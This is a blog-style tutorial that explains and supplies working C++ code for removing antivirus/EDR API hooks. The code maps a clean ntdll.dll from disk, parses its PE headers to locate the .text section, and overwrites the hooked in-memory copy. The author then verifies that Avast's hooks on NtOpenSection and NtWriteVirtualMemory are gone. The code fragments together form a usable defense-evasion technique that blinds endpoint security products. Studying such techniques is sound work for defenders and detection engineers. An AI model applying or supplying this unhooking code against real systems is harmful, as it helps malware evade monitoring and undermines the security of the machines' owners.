PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a systemcall to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 1, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

handle hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what were are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the hookedSectionHeader->VirtualAddress address of the .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes )

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize)

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax and a number instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

- Solomon Sklash